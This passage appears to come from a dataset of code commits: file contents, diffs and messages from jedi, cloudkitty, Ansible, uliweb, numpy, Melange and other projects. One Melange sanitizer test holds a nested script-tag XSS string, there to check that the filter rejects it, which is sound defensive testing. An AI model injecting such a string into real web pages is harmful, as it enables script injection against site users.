s8 = "str(int[zip("
run(s7, 'center', 0)
run(s8, 'zip', 0)
run(s8, 'str', 0, 8)
run("import time; abc = time; abc.sleep(", 'sleep', 0)
# jedi #57
s = "def func(alpha, beta): pass\n" \
"func(alpha='101',"
run(s, 'func', 0, column=13, line=2)
def test_flows(self):
# jedi-vim #9
self._run_simple("with open(", 'open', 0)
# jedi-vim #11
self._run_simple("for sorted(", 'sorted', 0)
self._run_simple("for s in sorted(", 'sorted', 0)
def test_complex(self):
s = """
def abc(a,b):
pass
def a(self):
abc(
if 1:
pass
"""
self._run(s, 'abc', 0, line=6, column=24)
s = """
import re
def huhu(it):
re.compile(
return it * 2
"""
self._run(s, 'compile', 0, line=4, column=31)
# jedi-vim #70
s = """def foo("""
assert Script(s).call_signatures() == []
# jedi-vim #116
s = """import itertools; test = getattr(itertools, 'chain'); test("""
self._run(s, 'chain', 0)
def test_call_signature_on_module(self):
"""github issue #240"""
s = 'import datetime; datetime('
# just don't throw an exception (if numpy doesn't exist, just ignore it)
assert Script(s).call_signatures() == []
def test_call_signatures_empty_parentheses_pre_space(self):
s = dedent("""\
def f(a, b):
pass
f( )""")
self._run(s, 'f', 0, line=3, column=3)
def test_multiple_signatures(self):
s = dedent("""\
if x:
def f(a, b):
pass
else:
def f(a, b):
pass
f(""")
assert len(Script(s).call_signatures()) == 2
def test_call_signatures_whitespace(self):
s = dedent("""\
abs(
def x():
pass
""")
self._run(s, 'abs', 0, line=1, column=5)
def test_decorator_in_class(self):
"""
There's still an implicit param, with a decorator.
Github issue #319.
"""
s = dedent("""\
def static(func):
def wrapped(obj, *args):
return f(type(obj), *args)
return wrapped
class C(object):
@static
def test(cls):
return 10
C().test(""")
signatures = Script(s).call_signatures()
assert len(signatures) == 1
x = [p.description for p in signatures[0].params]
assert x == ['*args']
class TestParams(TestCase):
def params(self, source, line=None, column=None):
signatures = Script(source, line, column).call_signatures()
assert len(signatures) == 1
return signatures[0].params
def test_param_name(self):
if not is_py33:
p = self.params('''int(''')
# int is defined as: `int(x[, base])`
assert p[0].name == 'x'
assert p[1].name == 'base'
p = self.params('''open(something,''')
assert p[0].name in ['file', 'name']
assert p[1].name == 'mode'
def test_signature_is_definition():
"""
Through inheritance, a call signature is a sub class of Definition.
Check if the attributes match.
"""
s = """class Spam(): pass\nSpam"""
signature = Script(s + '(').call_signatures()[0]
definition = Script(s + '(').goto_definitions()[0]
    assert signature.line == 1
    assert signature.column == 6
# Now compare all the attributes that a CallSignature must also have.
for attr_name in dir(definition):
dont_scan = ['defined_names', 'line_nr', 'start_pos', 'documentation', 'doc']
if attr_name.startswith('_') or attr_name in dont_scan:
continue
attribute = getattr(definition, attr_name)
signature_attribute = getattr(signature, attr_name)
if inspect.ismethod(attribute):
assert attribute() == signature_attribute()
else:
assert attribute == signature_attribute
def test_no_signature():
# str doesn't have a __call__ method
assert Script('str()(').call_signatures() == []
s = dedent("""\
class X():
pass
X()(""")
assert Script(s).call_signatures() == []
assert len(Script(s, column=2).call_signatures()) == 1
|
Python
| 0.000508
|
@@ -5416,21 +5416,52 @@
tation',
- 'doc
+%0A 'doc', 'parent
'%5D%0A
|
0ea32a2b51438b55130082e54f30fc9c97bd9d85
|
Fix compatibility with oslo.db 12.1.0
|
cloudkitty/db/__init__.py
|
cloudkitty/db/__init__.py
|
# -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
global _FACADE
if _FACADE is None:
_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(**kwargs):
facade = _create_facade_lazily()
return facade.get_session(**kwargs)
|
Python
| 0.000019
|
@@ -794,70 +794,299 @@
-_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk
+# FIXME(priteau): Remove autocommit=True (and ideally use of%0A # LegacyEngineFacade) asap since it's not compatible with SQLAlchemy%0A # 2.0.%0A _FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True,%0A autocommit
=Tru
|
cfe7de10ef9c6c1d8d5be71993e5f96ace58953d
|
Update Ansible release version to 2.6.0dev0.
|
lib/ansible/release.py
|
lib/ansible/release.py
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0a1'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
|
Python
| 0
|
@@ -851,10 +851,12 @@
.6.0
-a1
+dev0
'%0A__
|
359f337d7cfd0dac2eec8ecce643af10588e3e6a
|
Fix i18n __radd__ bug
|
uliweb/i18n/lazystr.py
|
uliweb/i18n/lazystr.py
|
def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return self.getvalue() + obj
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
|
Python
| 0.263457
|
@@ -1356,32 +1356,38 @@
%0D%0A return
+ obj +
self.getvalue()
@@ -1378,38 +1378,32 @@
self.getvalue()
- + obj
%0D%0A %0D%0A
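Decoded: `__radd__` implements the reflected form `obj + lazystring`, so the operands must be swapped — the corrected method, reconstructed from the hunks above:

    def __radd__(self, obj):
        # invoked for obj + self, so obj belongs on the left
        return obj + self.getvalue()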
|
ac985005f925c0d37ae337ada0bf88b50becaee6
|
change scheduler
|
coalics/schedule.py
|
coalics/schedule.py
|
import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
if prev_job: print(prev_job.result)
if prev_job == None or prev_job.result != None:
prev_job = q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
|
Python
| 0.000001
|
@@ -805,123 +805,8 @@
- if prev_job: print(prev_job.result)%0A if prev_job == None or prev_job.result != None:%0A prev_job =
q.e
|
bcf244e19c20fafcc89658d4aac8859097deb18c
|
Add ValidationDecoratorTest class
|
test/test_validation.py
|
test/test_validation.py
|
# -*- coding: utf-8 -*-
import unittest
from mock import Mock, patch
from cachetools.func import lru_cache
from nose_parameterized import parameterized
from spam_lists.validation import accepts_valid_urls, is_valid_url
from spam_lists.exceptions import InvalidURLError
class AcceptValidUrlsTest(unittest.TestCase):
def setUp(self):
self.is_valid_url_patcher = patch('spam_lists.validation.is_valid_url')
self.is_valid_url_mock = self.is_valid_url_patcher.start()
function = Mock()
function.__name__ = 'function'
self.client = Mock()
self.function = function
self.decorated_function = accepts_valid_urls(self.function)
def tearDown(self):
self.is_valid_url_patcher.stop()
@parameterized.expand([
('hostname', 'https://valid.com'),
('ipv4_host', 'http://122.34.59.109'),
('ipv6_host', 'http://[2001:db8:abc:123::42]')
])
def test_accept_valid_urls_for_valid(self, _, url):
self.decorated_function(self.client, url)
self.function.assert_called_once_with(self.client, url)
@parameterized.expand([
('invalid_hostname', 'http://-abc.com'),
('invalid_schema', 'abc://hostname.com'),
('no_schema', 'hostname.com'),
('invalid_ipv4', 'http://999.999.999.999'),
('invalid_ipv4', 'http://127.0.0.0.1'),
('invalid_ipv6', 'http://[2001:db8:abcef:123::42]'),
('invalid_ipv6', 'http://[2001:db8:abch:123::42]')
])
    def test_accept_valid_urls_for_invalid(self, _, url):
self.is_valid_url_mock.return_value = False
self.assertRaises(InvalidURLError, self.decorated_function, self.client, url)
self.function.assert_not_called()
@lru_cache()
def get_url_tester_mock(identifier):
source = Mock()
source.identifier = identifier
return source
class IsValidUrlTest(unittest.TestCase):
@parameterized.expand([
('http_scheme', 'http://test.url.com'),
('https_scheme', 'https://google.com'),
('ftp_scheme', 'ftp://ftp.test.com'),
('numeric_hostname', 'http://999.com'),
('final_slash', 'https://google.com/'),
('path_query_and_fragment', 'https://test.domain.com/path/element?var=1&var_2=3#fragment'),
('query', 'http://test.domain.com?var_1=1&var_2=2'),
('path', 'http://test.domain.com/path'),
('path_and_fragment', 'http://test.domain.com/path#fragment'),
('query_and_fragment', 'http://test.domain.com?var_1=1&var_2=2#fragment'),
('port', 'https://test.domain.com:123'),
('authentication', 'https://abc:def@test.domain.com'),
('ipv4', 'http://255.0.0.255'),
('ipv6', 'http://[2001:db8:abc:125::45]')
])
def test_is_valid_url_for_url_with(self, _, url):
self.assertTrue(is_valid_url(url))
@parameterized.expand([
('no_schema', 'test.url.com'),
('invalid_ipv4', 'http://266.0.0.266'),
('invalid_ipv6', 'http://127.0.0.1.1'),
('invalid_port', 'http://test.domain.com:aaa'),
('no_top_level_domain', 'https://testdomaincom'),
('invalid_hostname', 'http://-invalid.domain.com')
])
def test_is_valid_url_for_invalid_url_with(self, _, url):
self.assertFalse(is_valid_url(url))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Python
| 0
|
@@ -4010,16 +4010,920 @@
rl(url))
+%0A %0Aclass ValidationDecoratorTest(object):%0A %0A def setUp(self):%0A self.validity_tester_patcher = patch(self.validity_tester)%0A self.validity_tester_mock = self.validity_tester_patcher.start()%0A %0A function = Mock()%0A function.__name__ = 'function'%0A %0A self.obj = Mock()%0A self.function = function%0A self.decorated_function = self.decorator(self.function)%0A %0A def tearDown(self):%0A self.validity_tester_patcher.stop()%0A %0A def _test_wrapper_for_valid(self, value):%0A self.decorated_function(self.obj, value)%0A self.function.assert_called_once_with(self.obj, value)%0A %0A def _test_wrapper_for_invalid(self, value):%0A self.validity_tester_mock.return_value = False%0A %0A self.assertRaises(self.exception_type, self.decorated_function, self.obj, value)%0A self.function.assert_not_called()
%0A%0Aif __n
|
9b354f4dc00e3aef4cfceae71be60b1dc60a1927
|
Add test for ticket #1559.
|
numpy/ma/tests/test_regression.py
|
numpy/ma/tests/test_regression.py
|
from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
|
Python
| 0
|
@@ -1075,8 +1075,290 @@
ode%22))%0A%0A
+ def test_atleast_2d(self):%0A %22%22%22Ticket #1559%22%22%22%0A a = np.ma.masked_array(%5B0.0, 1.2, 3.5%5D, mask=%5BFalse, True, False%5D)%0A b = np.atleast_2d(a)%0A assert_(a.mask.ndim == 1)%0A assert_(b.mask.ndim == 2)%0A%0A%0Aif __name__ == %22__main__%22:%0A run_module_suite()%0A
|
813c478f06c175e36dc8334fd37195e403a42166
|
update test_symbol_accuracy
|
test_symbol_accuracy.py
|
test_symbol_accuracy.py
|
from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[1] < y[1]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
X, Y = create_testing_data_for_symbol(sym)
print "----"
money = INITIAL_CAPITAL
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.02:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
gains.append([sym, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
main()
|
Python
| 0.000025
|
@@ -227,16 +227,16 @@
f x%5B
-1
+3
%5D %3C y%5B
-1
+3
%5D:%0A%09
@@ -364,16 +364,31 @@
ymbols:%0A
+%09%09print %22----%22%0A
%09%09X, Y =
@@ -423,31 +423,16 @@
bol(sym)
-%0A%09%09print %22----%22
%0A%0A%09%09mone
@@ -451,16 +451,47 @@
CAPITAL%0A
+%09%09true_pos = 0%0A%09%09false_pos = 0%0A
%09%09for i
@@ -645,17 +645,17 @@
ue * 1.0
-2
+1
:%0A%09%09%09%09in
@@ -831,16 +831,84 @@
revenue%0A
+%09%09%09%09if gain %3E 0.0:%0A%09%09%09%09%09true_pos += 1%0A%09%09%09%09else:%0A%09%09%09%09%09false_pos += 1%0A
%09%09print
@@ -1087,28 +1087,226 @@
%22)%22%0A
-%0A%09%09gains.append(%5Bsym
+%09%09accuracy = 0 if false_pos+true_pos == 0 else float(true_pos)/float(false_pos+true_pos)%0A%09%09print %22true pos:%22, true_pos, %22false pos:%22, false_pos, %22accuracy:%22, accuracy%0A%0A%09%09gains.append(%5Bsym, true_pos, false_pos, accuracy
, to
@@ -1413,15 +1413,102 @@
ain__%22:%0A
+%09# import dataset%0A%0A%09# X, y = dataset.create_testing_data_for_symbol('CBI')%0A%0A%09# print X%0A
%09main()
|
43d30fd28bd09708c1ad0dd64b702a61d9a25636
|
add test for XSS attack
|
tests/app/soc/logic/test_filtering.py
|
tests/app/soc/logic/test_filtering.py
|
#!/usr/bin/env python2.5
# -*- coding: UTF-8 -*-
#
# Copyright 2010 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = [
'"Matthew Wilkes" <matthew@matthewwilkes.co.uk>',
]
import unittest
from htmlsanitizer import HtmlSanitizer
class FilteringTest(unittest.TestCase):
"""Tests to check HTML filtering works correctly.
"""
def test_newlines_preserved_unchanged_normally(self):
""" Test that newline is preserved in paragraphs. """
dirty = u'''<p>\r\n</p>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_preserved_if_needed_to_be_wrapped(self):
""" Test that when wrapped in <p /> tags newlines are preserved
(albeit normalised)."""
dirty = u'''\n\n'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_wrapped_together_if_in_filtered_tags(self):
""" Test that when tags are filtered their contents is preserved (albeit
with normalised whitespace). """
dirty = u'''<div>\n</div><div>\n</div>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_elements_that_compare_equal_arent_reordered(self):
""" Test that ordering is preserved with multiple identical tags.
If two elements have the same contents they compare equal. You can
abuse the insert method in beautiful soup to reorder tags, as if a
subelement is reinserted it will be moved to the position passed to
insert. Unfortunately, this gets confused if elements compare equal,
which results in only the first one being moved and all others left in
place. If all elements are 'moved' then this has the effect of the
other equal tags being left at the end of the stream.
"""
dirty = u'''<div>\n<h1>One</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>\n<div>\n<h1>Two</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>'''
expected = u'''\n<h1>One</h1>\n<h2>Repeat</h2>\n<h1>Two</h1>\n<h2>Repeat</h2>\n'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_break_tags_are_preserved(self):
""" Test that <br /> tags are preserved when wrapped. """
dirty = u'''Hello.<br />Goodbye.'''
expected = u'''<p>Hello.<br />Goodbye.</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_no_extra_paragraphs_are_inserted(self):
"""Test that no extra paragraph tags are incerted"""
dirty = u'''<p>Bob</p>\n<p>Hello Bob</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
|
Python
| 0
|
@@ -3514,8 +3514,557 @@
string)%0A
+%0A def test_xss_gets_filtered(self):%0A %22%22%22Test that the XSS as described in %5B0%5D gets filtered.%0A%0A %5B0%5D http://stackoverflow.com/questions/699468/python-html-sanitizer-scrubber-filter/812785#812785%0A %22%22%22%0A from HTMLParser import HTMLParseError%0A%0A dirty = u'''%3C%3Cscript%3Escript%3E alert(%22Haha, I hacked your page.%22); %3C/%3C/script%3Escript%3E'''%0A cleaner = HtmlSanitizer.Cleaner()%0A try:%0A cleaner.string = dirty%0A cleaner.clean()%0A self.fail(%22Invalid html should generate an error message.%22)%0A except HTMLParseError, msg:%0A pass%0A
|
cf4fc126b49c425d7f441abc91f4114b5f1303ea
|
Move publication field above title/subtitle/description in admin
|
cms_lab_carousel/admin.py
|
cms_lab_carousel/admin.py
|
from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'publication',
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
|
Python
| 0
|
@@ -1472,24 +1472,51 @@
'carousel',%0A
+ 'publication',%0A
@@ -1729,35 +1729,8 @@
: %5B%0A
- 'publication',%0A
|
46c490df9a3e60119de5485fb508e527e6dbb057
|
Add testcase for hr tag
|
tests/app/soc/logic/test_filtering.py
|
tests/app/soc/logic/test_filtering.py
|
#!/usr/bin/env python2.5
# -*- coding: UTF-8 -*-
#
# Copyright 2010 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = [
'"Matthew Wilkes" <matthew@matthewwilkes.co.uk>',
]
import unittest
from htmlsanitizer import HtmlSanitizer
class FilteringTest(unittest.TestCase):
"""Tests to check HTML filtering works correctly.
"""
def test_newlines_preserved_unchanged_normally(self):
""" Test that newline is preserved in paragraphs. """
dirty = u'''<p>\r\n</p>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_preserved_if_needed_to_be_wrapped(self):
""" Test that when wrapped in <p /> tags newlines are preserved
(albeit normalised)."""
dirty = u'''\n\n'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_wrapped_together_if_in_filtered_tags(self):
""" Test that when tags are filtered their contents is preserved (albeit
with normalised whitespace). """
dirty = u'''<div>\n</div><div>\n</div>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_elements_that_compare_equal_arent_reordered(self):
""" Test that ordering is preserved with multiple identical tags.
If two elements have the same contents they compare equal. You can
abuse the insert method in beautiful soup to reorder tags, as if a
subelement is reinserted it will be moved to the position passed to
insert. Unfortunately, this gets confused if elements compare equal,
which results in only the first one being moved and all others left in
place. If all elements are 'moved' then this has the effect of the
other equal tags being left at the end of the stream.
"""
dirty = u'''<div>\n<h1>One</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>\n<div>\n<h1>Two</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>'''
expected = u'''\n<h1>One</h1>\n<h2>Repeat</h2>\n<h1>Two</h1>\n<h2>Repeat</h2>\n'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_break_tags_are_preserved(self):
""" Test that <br /> tags are preserved when wrapped. """
dirty = u'''Hello.<br />Goodbye.'''
expected = u'''<p>Hello.<br />Goodbye.</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_no_extra_paragraphs_are_inserted(self):
"""Test that no extra paragraph tags are inserted"""
dirty = u'''<p>Bob</p>\n<p>Hello Bob</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
def test_xss_gets_filtered(self):
"""Test that the XSS as described in [0] gets filtered.
[0] http://stackoverflow.com/questions/699468/python-html-sanitizer-scrubber-filter/812785#812785
"""
from HTMLParser import HTMLParseError
dirty = u'''<<script>script> alert("Haha, I hacked your page."); </</script>script>'''
cleaner = HtmlSanitizer.Cleaner()
try:
cleaner.string = dirty
cleaner.clean()
self.fail("Invalid html should generate an error message.")
except HTMLParseError, msg:
pass
def test_anchor_tags_are_preserved(self):
"""Test that anchor tags are preserved"""
dirty = u'''<p><a name="there"></a></p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
def test_partial_quoted_tags_are_no_problem(self):
"""If some partial HTML is quoted it should be treated as text and not
subject to validation errors.
"""
dirty = u'''<p><a href="http://www.example.com"</p>'''
expected = u'''<p><a href="http://www.example.com"</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
|
Python
| 0
|
@@ -4761,28 +4761,271 @@
l(cleaner.string, expected)%0A
+%0A def test_hr_tags_are_preserved(self):%0A %22%22%22Test that hr tags are preserved%22%22%22%0A dirty = u'''%3Cp%3E%3Chr%3E%3C/p%3E'''%0A cleaner = HtmlSanitizer.Cleaner()%0A cleaner.string = dirty%0A cleaner.clean()%0A self.assertEqual(dirty, cleaner.string)%0A
|
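Decoded, the test case this diff appends is:

    def test_hr_tags_are_preserved(self):
        """Test that hr tags are preserved"""
        dirty = u'''<p><hr></p>'''
        cleaner = HtmlSanitizer.Cleaner()
        cleaner.string = dirty
        cleaner.clean()
        self.assertEqual(dirty, cleaner.string)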
aef9672ac63800c1f63cf721da9b89bfaa1e87b8
|
Change default sort order
|
colourlens/views.py
|
colourlens/views.py
|
from django.db.models import Avg, Sum, Count
from django import forms
from django.forms.widgets import Input
from django.http import HttpResponse
from django.template import RequestContext, loader
from django.views.decorators.cache import cache_page
from colourlens.models import Artwork, Colour
PROM_ATTRS = {'min': '0', 'max': '100', 'step': '5'}
DIST_ATTRS = {'min': '0', 'max': '50', 'step': '1'}
class RangeInput(Input):
input_type = "range"
class ColourForm(forms.Form):
def __init__(self, *args, **kwargs):
"""
Add classes to denote type of input
"""
super(ColourForm, self).__init__(*args, **kwargs)
for k, v in self.fields.iteritems():
if v.widget.__class__ == forms.CheckboxInput:
v.widget.attrs['class'] = 'colourbox'
elif v.widget.__class__ == RangeInput:
v.widget.attrs['class'] = 'slider'
black = forms.BooleanField(required=False)
grey = forms.BooleanField(required=False)
silver = forms.BooleanField(required=False)
white = forms.BooleanField(required=False)
red = forms.BooleanField(required=False)
maroon = forms.BooleanField(required=False)
brown = forms.BooleanField(required=False)
orange = forms.BooleanField(required=False)
yellow = forms.BooleanField(required=False)
lime = forms.BooleanField(required=False)
green = forms.BooleanField(required=False)
olive = forms.BooleanField(required=False)
cyan = forms.BooleanField(required=False)
teal = forms.BooleanField(required=False)
blue = forms.BooleanField(required=False)
navy = forms.BooleanField(required=False)
magenta = forms.BooleanField(required=False)
purple = forms.BooleanField(required=False)
prominence = forms.IntegerField(label="Increase colour area",
widget=RangeInput(attrs=PROM_ATTRS))
distance = forms.IntegerField(label="Broaden palette",
widget=RangeInput(attrs=DIST_ATTRS))
submitted = forms.CharField(widget=forms.HiddenInput())
@cache_page(60 * 60)
def index(request, institution=False):
"""
Search and browse colours
"""
DISTANCE = 20
artworks = Artwork.objects.select_related().all()
colours = Colour.objects.all()
req_colours = request.GET.getlist('colour', [])
startyear = request.GET.get('startyear', None)
endyear = request.GET.get('endyear', None)
colour_filters = {}
if startyear:
artworks = artworks.filter(year__gte=startyear)
colour_filters['artwork__year__gte'] = startyear
if endyear:
artworks = artworks.filter(year__lte=endyear)
colour_filters['artwork__year__lte'] = endyear
for hex_value in req_colours:
artworks = artworks.filter(
colours__hex_value=hex_value,
colourdistance__distance__lte=DISTANCE,
)
if institution:
artworks = artworks.filter(institution=institution)
colour_filters['artwork__institution'] = institution
artworks = artworks.annotate(
ave_distance=Avg("colourdistance__distance"),
ave_presence=Avg("colourdistance__presence"),
tot_presence=Sum("colourdistance__presence")
)
artworks = artworks.order_by('-tot_presence').distinct()
if req_colours:
colour_filters['artwork__id__in'] = [a.id for a in artworks[:990]]
